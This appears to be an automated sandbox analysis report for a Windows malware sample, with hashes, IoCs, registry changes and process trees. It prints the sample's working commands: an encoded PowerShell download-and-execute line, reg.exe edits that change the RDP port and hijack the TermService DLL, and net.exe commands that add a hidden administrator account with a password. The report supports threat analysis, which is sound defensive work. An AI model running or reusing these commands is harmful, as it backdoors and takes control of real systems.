Analysis
-
max time kernel
37s -
max time network
105s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
15-11-2020 22:40
Static task
static1
Behavioral task
behavioral1
Sample
fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
Resource
win10v20201028
General
-
Target
fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
-
Size
3.4MB
-
MD5
e8b8bd2c147f0bf4aa3762b32b778351
-
SHA1
a022f98fc7f16cb849ea2b6826eedd077db2360b
-
SHA256
fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1
-
SHA512
0f0591aa79c39bd01cc7fe9b654e2709975c0eb47dce2abb8ddd2d7b49be8015a94b8f284a5ce94295ed7ebcecf6ded4346702672271b665d8873040938c9a9b
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 16 648 powershell.exe 18 648 powershell.exe 19 648 powershell.exe 20 648 powershell.exe 22 648 powershell.exe 24 648 powershell.exe 26 648 powershell.exe 28 648 powershell.exe 30 648 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 4316 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 3912 3912 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE865.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ptyet41g.5ba.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1ccurbfw.erz.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE7A6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE875.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE7C7.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE854.tmp powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = de4ef1e88fadd601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 648 powershell.exe 648 powershell.exe 648 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4316 powershell.exe Token: SeIncreaseQuotaPrivilege 4316 powershell.exe Token: SeSecurityPrivilege 4316 powershell.exe Token: SeTakeOwnershipPrivilege 4316 powershell.exe Token: SeLoadDriverPrivilege 4316 powershell.exe Token: SeSystemProfilePrivilege 4316 powershell.exe Token: SeSystemtimePrivilege 4316 powershell.exe Token: SeProfSingleProcessPrivilege 4316 powershell.exe Token: SeIncBasePriorityPrivilege 4316 powershell.exe Token: SeCreatePagefilePrivilege 4316 powershell.exe Token: SeBackupPrivilege 4316 powershell.exe Token: SeRestorePrivilege 4316 powershell.exe Token: SeShutdownPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeSystemEnvironmentPrivilege 4316 powershell.exe Token: SeRemoteShutdownPrivilege 4316 powershell.exe Token: SeUndockPrivilege 4316 powershell.exe Token: SeManageVolumePrivilege 4316 powershell.exe Token: 33 4316 powershell.exe Token: 34 4316 powershell.exe Token: 35 4316 powershell.exe Token: 36 4316 powershell.exe Token: SeIncreaseQuotaPrivilege 4316 powershell.exe Token: SeSecurityPrivilege 4316 powershell.exe Token: SeTakeOwnershipPrivilege 4316 powershell.exe Token: SeLoadDriverPrivilege 4316 powershell.exe Token: SeSystemProfilePrivilege 4316 powershell.exe Token: SeSystemtimePrivilege 4316 powershell.exe Token: SeProfSingleProcessPrivilege 4316 powershell.exe Token: SeIncBasePriorityPrivilege 4316 powershell.exe Token: SeCreatePagefilePrivilege 4316 powershell.exe Token: SeBackupPrivilege 4316 powershell.exe Token: SeRestorePrivilege 4316 powershell.exe Token: SeShutdownPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeSystemEnvironmentPrivilege 4316 powershell.exe Token: SeRemoteShutdownPrivilege 4316 powershell.exe Token: SeUndockPrivilege 4316 powershell.exe Token: SeManageVolumePrivilege 4316 powershell.exe Token: 33 4316 powershell.exe Token: 34 4316 powershell.exe Token: 35 4316 powershell.exe Token: 36 4316 powershell.exe Token: SeIncreaseQuotaPrivilege 4316 powershell.exe Token: SeSecurityPrivilege 4316 powershell.exe Token: SeTakeOwnershipPrivilege 4316 powershell.exe Token: SeLoadDriverPrivilege 4316 powershell.exe Token: SeSystemProfilePrivilege 4316 powershell.exe Token: SeSystemtimePrivilege 4316 powershell.exe Token: SeProfSingleProcessPrivilege 4316 powershell.exe Token: SeIncBasePriorityPrivilege 4316 powershell.exe Token: SeCreatePagefilePrivilege 4316 powershell.exe Token: SeBackupPrivilege 4316 powershell.exe Token: SeRestorePrivilege 4316 powershell.exe Token: SeShutdownPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeSystemEnvironmentPrivilege 4316 powershell.exe Token: SeRemoteShutdownPrivilege 4316 powershell.exe Token: SeUndockPrivilege 4316 powershell.exe Token: SeManageVolumePrivilege 4316 powershell.exe Token: 33 4316 powershell.exe Token: 34 4316 powershell.exe Token: 35 4316 powershell.exe Token: 36 4316 powershell.exe -
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4760 wrote to memory of 4316 4760 fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe powershell.exe PID 4760 wrote to memory of 4316 4760 fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe powershell.exe PID 4316 wrote to memory of 508 4316 powershell.exe csc.exe PID 4316 wrote to memory of 508 4316 powershell.exe csc.exe PID 508 wrote to memory of 908 508 csc.exe cvtres.exe PID 508 wrote to memory of 908 508 csc.exe cvtres.exe PID 4316 wrote to memory of 1844 4316 powershell.exe reg.exe PID 4316 wrote to memory of 1844 4316 powershell.exe reg.exe PID 4316 wrote to memory of 2000 4316 powershell.exe reg.exe PID 4316 wrote to memory of 2000 4316 powershell.exe reg.exe PID 4316 wrote to memory of 932 4316 powershell.exe reg.exe PID 4316 wrote to memory of 932 4316 powershell.exe reg.exe PID 4316 wrote to memory of 2268 4316 powershell.exe net.exe PID 4316 wrote to memory of 2268 4316 powershell.exe net.exe PID 2268 wrote to memory of 2376 2268 net.exe net1.exe PID 2268 wrote to memory of 2376 2268 net.exe net1.exe PID 4316 wrote to memory of 2440 4316 powershell.exe cmd.exe PID 4316 wrote to memory of 2440 4316 powershell.exe cmd.exe PID 2440 wrote to memory of 2728 2440 cmd.exe cmd.exe PID 2440 wrote to memory of 2728 2440 cmd.exe cmd.exe PID 2728 wrote to memory of 2892 2728 cmd.exe net.exe PID 2728 wrote to memory of 2892 2728 cmd.exe net.exe PID 2892 wrote to memory of 4372 2892 net.exe net1.exe PID 2892 wrote to memory of 4372 2892 net.exe net1.exe PID 4316 wrote to memory of 3332 4316 powershell.exe cmd.exe PID 4316 wrote to memory of 3332 4316 powershell.exe cmd.exe PID 3332 wrote to memory of 4464 3332 cmd.exe cmd.exe PID 3332 wrote to memory of 4464 3332 cmd.exe cmd.exe PID 4464 wrote to memory of 3036 4464 cmd.exe net.exe PID 4464 wrote to memory of 3036 4464 cmd.exe net.exe PID 3036 wrote to memory of 3516 3036 net.exe net1.exe PID 3036 wrote to memory of 3516 3036 net.exe net1.exe PID 4524 wrote to memory of 4484 4524 cmd.exe net.exe PID 4524 wrote to memory of 4484 4524 cmd.exe net.exe PID 4484 wrote to memory of 4624 4484 net.exe net1.exe PID 4484 wrote to memory of 4624 4484 net.exe net1.exe PID 4580 wrote to memory of 3824 4580 cmd.exe net.exe PID 4580 wrote to memory of 3824 4580 cmd.exe net.exe PID 3824 wrote to memory of 3984 3824 net.exe net1.exe PID 3824 wrote to memory of 3984 3824 net.exe net1.exe PID 4668 wrote to memory of 4748 4668 cmd.exe net.exe PID 4668 wrote to memory of 4748 4668 cmd.exe net.exe PID 4748 wrote to memory of 4720 4748 net.exe net1.exe PID 4748 wrote to memory of 4720 4748 net.exe net1.exe PID 4292 wrote to memory of 4468 4292 cmd.exe net.exe PID 4292 wrote to memory of 4468 4292 cmd.exe net.exe PID 4468 wrote to memory of 4472 4468 net.exe net1.exe PID 4468 wrote to memory of 4472 4468 net.exe net1.exe PID 2032 wrote to memory of 4032 2032 cmd.exe net.exe PID 2032 wrote to memory of 4032 2032 cmd.exe net.exe PID 4032 wrote to memory of 2328 4032 net.exe net1.exe PID 4032 wrote to memory of 2328 4032 net.exe net1.exe PID 2436 wrote to memory of 4700 2436 cmd.exe net.exe PID 2436 wrote to memory of 4700 2436 cmd.exe net.exe PID 4700 wrote to memory of 2044 4700 net.exe net1.exe PID 4700 wrote to memory of 2044 4700 net.exe net1.exe PID 5028 wrote to memory of 3928 5028 cmd.exe WMIC.exe PID 5028 wrote to memory of 3928 5028 cmd.exe WMIC.exe PID 4220 wrote to memory of 4300 4220 cmd.exe WMIC.exe PID 4220 wrote to memory of 4300 4220 cmd.exe WMIC.exe PID 552 wrote to memory of 396 552 cmd.exe cmd.exe PID 552 wrote to memory of 396 552 cmd.exe cmd.exe PID 396 wrote to memory of 648 396 cmd.exe powershell.exe PID 396 wrote to memory of 648 396 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe"C:\Users\Admin\AppData\Local\Temp\fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B02.tmp" "c:\Users\Admin\AppData\Local\Temp\bsk1nuli\CSC5AFA9353C6024F6DB26019D1805C12.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin 6t6RXgqs /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin 6t6RXgqs /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin 6t6RXgqs /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin 6t6RXgqs1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin 6t6RXgqs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin 6t6RXgqs3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
